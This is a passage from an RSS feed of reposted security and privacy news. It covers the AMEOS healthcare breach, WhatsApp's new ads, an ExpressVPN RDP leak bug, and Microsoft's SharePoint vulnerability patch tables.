	In response, AMEOS has shut down all IT systems and terminated all external and internal network connections. Additionally, it reinforced existing measures and contracted external IT and forensic experts to aid with response efforts.
</p>

<p>
	 
</p>

<p>
	The data protection authorities in the countries have been informed accordingly, and a criminal complaint was filed with the police.
</p>

<p>
	 
</p>

<p>
	People who have received care at AMEOS facilities are advised to remain vigilant against phishing and scam attempts.
</p>

<p>
	 
</p>

<p>
	To date, there are no signs that the accessed data has been disseminated online, stated the healthcare provider.
</p>

<p>
	 
</p>

<p>
	The investigation is still underway, and AMEOS has promised to provide updates as new information becomes available.
</p>

<p>
	 
</p>

<p>
	"Currently, we have no specific evidence of an actual leak of your individual personal data," states the organization.
</p>

<p>
	 
</p>

<p>
	"You will be informed immediately upon completion of the ongoing review and investigation measures via this page."
</p>

<p>
	 
</p>

<p>
	At the time of writing, no major ransomware groups have taken responsibility for the attack at AMEOS. The organization did not specify if the attack involved data encryption, so the type of incident and the perpetrators are unknown.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/major-european-healthcare-network-discloses-security-breach/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 23 July 2025 at 12:57 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30370</guid><pubDate>Wed, 23 Jul 2025 02:58:21 +0000</pubDate></item><item><title>Meta is one step closer to bringing ads to WhatsApp for the first time</title><link>https://nsaneforums.com/news/security-privacy-news/meta-is-one-step-closer-to-bringing-ads-to-whatsapp-for-the-first-time-r30346/</link><description><![CDATA[<p>
	WhatsApp is rolling out Status Ads and Promoted Channel to more users on the latest beta app for iOS (version 25.20.10.78). These features bring sponsored content to the Updates tab, which currently houses Status and Channels. The new Status Ads will appear between regular user status updates, and clearly labeled as “Sponsored”, you’ll be able to swipe to dismiss or block advertisers.
</p>

<p>
	 
</p>

<p>
	Meanwhile, Promoted Channels will get their own placement in the channel directory to increase visibility for businesses and creators who pay. These will also carry a “sponsored” label. These updates have already been released to some Android beta testers, but not all; it’s the same situation on iOS, you may see these changes, or not.
</p>

<figure class="image image--expandable">
	<img alt="Status Ads and Promoted Channels in WhatsApp" class="ipsImage" height="425" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1753085203_wa_status_ads_promoted_channels_sponsored_content_updates_tab_preferences_activity_report_feature_ios.webp">
</figure>

<p>
	This is a big change for WhatsApp because it hasn’t shown ads ever since it was acquired by Meta. Ultimately, Meta is an ads company, so it’s not too shocking to see Meta incorporate ads in WhatsApp.
</p>

<p>
	 
</p>

<p>
	The decision to bring ads to WhatsApp is part of Meta’s broader monetization strategy to provide revenue streams for businesses and creators directly within the app. The company also says that the ads you see are based on limited information like your general region, app language, public channels followed, and engagement with previous ads.
</p>

<p>
	 
</p>

<p>
	If you connect your WhatsApp account to Meta’s Account Center, then it will also use your ad preference from other Meta apps to be used for targeting, but this is off by default. To give you more control, you can download your Activity Report to see which ads you’ve encountered. You can also block/report advertisers.
</p>

<p>
	 
</p>

<p>
	With Status Ads, businesses have a new way to reach more users, following a similar format already used in Instagram Stories. With Promoted Channels, content creators and businesses get a direct way to boost their visibility without relying on external platforms. For brands and organizations, these features will be welcomed, by Meta also thanks to additional revenue it will generate. Users on the other hand probably will not be happy to see ads infiltrating yet another app, especially one that claims to put privacy first.
</p>

<p>
	 
</p>

<p>
	Source and image: <a automate_uuid="99cccadc-d43a-4a02-9dcc-174f3bbd22be" href="https://wabetainfo.com/whatsapp-beta-for-ios-25-20-10-78-whats-new/" rel="external nofollow">WABetaInfo</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/meta-is-one-step-closer-to-bringing-ads-to-whatsapp-for-the-first-time/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 22 July 2025 at 4:42 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30346</guid><pubDate>Mon, 21 Jul 2025 18:43:40 +0000</pubDate></item><item><title>ExpressVPN bug leaked user IPs in Remote Desktop sessions</title><link>https://nsaneforums.com/news/security-privacy-news/expressvpn-bug-leaked-user-ips-in-remote-desktop-sessions-r30345/</link><description><![CDATA[<p>
	ExpressVPN has fixed a flaw in its Windows client that caused Remote Desktop Protocol (RDP) traffic to bypass the virtual private network (VPN) tunnel, exposing the users' real IP addresses.
</p>

<p>
	 
</p>

<p>
	One of the key premises of a VPN is masking a user's IP address, allowing users to stay anonymous online, and in some cases, bypass censorship. Failing to do so is a severe technical failure for a VPN product.
</p>

<p>
	 
</p>

<p>
	ExpressVPN is a leading VPN service provider, consistently rated among the top VPN services, and used by millions worldwide. It utilizes RAM-only servers that don't retain user data and adheres to an audited no-logs policy.
</p>

<p>
	 
</p>

<p>
	On April 25, 2025, a security researcher known as "Adam-X" reported a vulnerability through ExpressVPN's bug bounty program that exposed RDP and other TCP traffic transmitted over port 3389.
</p>

<p>
	 
</p>

<p>
	Upon investigating, the ExpressVPN team found that the issue was caused by remnants of debug code used for internal testing being mistakenly included in production builds, specifically, from 12.97 (released four months ago) to 12.101.0.2-beta.
</p>

<p>
	 
</p>

<p>
	"If a user established a connection using RDP, that traffic could bypass the VPN tunnel," <a href="https://www.expressvpn.com/blog/expressvpn-rdp-leak-fixed/" rel="external nofollow" target="_blank">reported ExpressVPN in an announcement</a>.
</p>

<p>
	 
</p>

<p>
	"This did not affect encryption, but it meant that traffic from RDP connections wasn't routed through ExpressVPN as expected."
</p>

<p>
	 
</p>

<p>
	"As a result, an observer, like an ISP or someone on the same network, could have seen not only that the user was connected to ExpressVPN, but also that they were accessing specific remote servers over RDP—information that would normally be protected."
</p>

<p>
	 
</p>

<p>
	A patch was made available with ExpressVPN version 12.101.0.45, released on June 18, 2025.
</p>

<p>
	 
</p>

<p>
	The privacy firm notes that the security lapse did not compromise encryption on the tunnels, and the leak scenarios only affect those using Remote Desktop Protocol (RDP), which they consider to be low-risk for their customers.
</p>

<p>
	 
</p>

<p>
	"As mentioned above, in practice, this issue would most commonly have affected users actively using RDP—a protocol that's generally not used by typical consumers," reads ExpressVPN's advisory.
</p>

<p>
	 
</p>

<p>
	"Given that ExpressVPN's user base is made up predominantly of individual users rather than enterprise customers, the number of affected users is likely small."
</p>

<p>
	 
</p>

<p>
	RDP is a Microsoft network protocol that enables users to remotely control Windows systems over a network, used by IT administrators, remote workers, and enterprises.
</p>

<p>
	 
</p>

<p>
	Still, it is recommended that users upgrade their Windows clients to version 12.101.0.45 for ultimate protection.
</p>

<p>
	 
</p>

<p>
	ExpressVPN states that it will strengthen its internal build checks to prevent similar bugs from being introduced in production in the future, including enhanced automation in development testing.
</p>

<p>
	 
</p>

<p>
	Last year, ExpressVPN faced another issue causing <a href="https://www.bleepingcomputer.com/news/security/expressvpn-bug-has-been-leaking-some-dns-requests-for-years/" rel="external nofollow" target="_blank">DNS request leaks</a> when users enabled the 'slipt tunneling' feature on the Windows client.
</p>

<p>
	 
</p>

<p>
	The feature was temporarily disabled until a fix was implemented in a future release.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/expressvpn-bug-leaked-user-ips-in-remote-desktop-sessions/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 22 July 2025 at 4:39 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30345</guid><pubDate>Mon, 21 Jul 2025 18:42:17 +0000</pubDate></item><item><title>Microsoft releases detailed patch guidance for every SharePoint server remote vulnerability</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-releases-detailed-patch-guidance-for-every-sharepoint-server-remote-vulnerability-r30344/</link><description><![CDATA[<p>
	Earlier today, Microsoft <a automate_uuid="db5fb195-139b-4640-9fa2-365acd7e26e9" href="https://www.neowin.net/news/hackers-actively-exploiting-unpatched-microsoft-sharepoint-vulnerability-cve-2025-53770/" rel="external nofollow">published preliminary details regarding the SharePoint vulnerability</a> which is being actively exploited by threat actors. Tracked under CVE-2025-53770, the flaw allows cyber-attackers and unauthorized entities to remotely execute arbitrary code on on-premises SharePoint servers without any authentication.
</p>

<p>
	 
</p>

<p>
	Microsoft's Defender Vulnerability Management team reiterated that it is aware of the widespread problem and has issued detailed guidance on flaws, their nature, severity and the patch status. This guidance applies to CVE‑2025‑49704, CVE‑2025‑49706, which have already been patched, as well as CVE‑2025‑53770 and CVE‑2025‑53771 which are receiving patches now:
</p>

<p>
	 
</p>

<table border="1" class="lia-border-style-solid" style="border-width:1px; width:100%">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong> CVE</strong><strong> </strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>Type</strong><strong> </strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong> CVSS</strong><strong> v3.1</strong><strong> </strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong> </strong><strong>Patch</strong><strong> status</strong><strong> </strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p>
					<strong>CVE‑2025‑49704</strong>
				</p>
			</td>
			<td>
				<p>
					Improper control of code‑generation → <em>authenticated</em> RCE
				</p>
			</td>
			<td>
				<p>
					8.8 (High)
				</p>
			</td>
			<td>
				<p>
					<strong>Fixed in the</strong><strong> 8</strong><strong> July</strong><strong> 2025 security updates</strong> — Subscription Edition KB 5002768, SharePoint Server 2019 KB 5002741, SharePoint Server 2016 KB 5002744. <a automate_uuid="38298a9b-07d8-474a-a72e-d37915838b0d" href="https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-july-8-2025-kb5002741-d860f51b-fcdf-41e4-89de-9ce487c06548" rel="external nofollow" target="_blank">Microsoft Support</a>
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>CVE‑2025‑49706</strong>
				</p>
			</td>
			<td>
				<p>
					Improper authentication / spoofing
				</p>
			</td>
			<td>
				<p>
					6.3 (Medium)
				</p>
			</td>
			<td>
				<p>
					<strong>Fixed in the same 8</strong><strong> July</strong><strong> 2025 updates</strong> (KB 5002768 / 5002741 / 5002744). <a automate_uuid="a13a44a9-6fe0-4ec0-b68e-cb052e67698b" href="https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-july-8-2025-kb5002741-d860f51b-fcdf-41e4-89de-9ce487c06548" rel="external nofollow" target="_blank">Microsoft Support</a>
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>CVE‑2025‑53770</strong>
				</p>
			</td>
			<td>
				<p>
					Deserialization of untrusted data → <em>unauthenticated</em> RCE
				</p>
			</td>
			<td>
				<p>
					9.8 (Critical)
				</p>
			</td>
			<td>
				<p>
					<strong>Emergency patch released</strong> for Subscription Edition KB 5002768 and SharePoint 2019 KB 5002754; <strong>patch for</strong><strong> SharePoint</strong><strong> 2016 is still pending</strong>. <a automate_uuid="d9da9a7c-c073-43a9-9fb0-9651c4870b8f" href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/" rel="external nofollow" target="_blank">Microsoft Security Response Center</a>
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>CVE‑2025‑53771</strong>
				</p>
			</td>
			<td>
				<p>
					Path‑traversal / spoofing
				</p>
			</td>
			<td>
				<p>
					6.3 (Medium)
				</p>
			</td>
			<td>
				<p>
					Addressed by the <strong>same emergency updates</strong> as CVE‑2025‑53770 (SE KB 5002768, 2019 KB 5002754); <strong>SharePoint</strong><strong> 2016 fix forthcoming</strong>. <a automate_uuid="303b65b3-5196-43bd-a2d4-308cf715e130" href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/" rel="external nofollow" target="_blank">Microsoft Security Response Center</a>
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	Up next, the company has also published a table simplifying the affected SharePoint Server versions across the four vulnerabilities:
</p>

<p>
	 
</p>

<table border="1" style="border-width:1px; width:100%">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Product</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>CVE‑2025‑49704</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>CVE‑2025‑49706</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>CVE‑2025‑53770</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>CVE‑2025‑53771</strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p>
					<strong>SharePoint Server Subscription Edition</strong>
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>SharePoint Server 2019</strong>
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>SharePoint Server 2016</strong>
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">✅</span> Affected
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p>
					<strong>SharePoint Online</strong>
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">❌</span> Not affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">❌</span> Not affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">❌</span> Not affected
				</p>
			</td>
			<td>
				<p>
					<span class="ipsEmoji">❌</span> Not affected
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	You can find more details <a automate_uuid="e0d4554b-d531-4d04-850b-3ba06ef9fc70" href="https://techcommunity.microsoft.com/blog/vulnerability-management/critical-sharepoint-exploits-exposed-mdvm-response-and-protection-strategy/4435030" rel="external nofollow">here</a> on the official blog post on Microsoft's Tech Community website.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-releases-detailed-patch-guidance-for-every-sharepoint-server-remote-vulnerability/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 22 July 2025 at 4:39 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30344</guid><pubDate>Mon, 21 Jul 2025 18:40:57 +0000</pubDate></item></channel></rss>
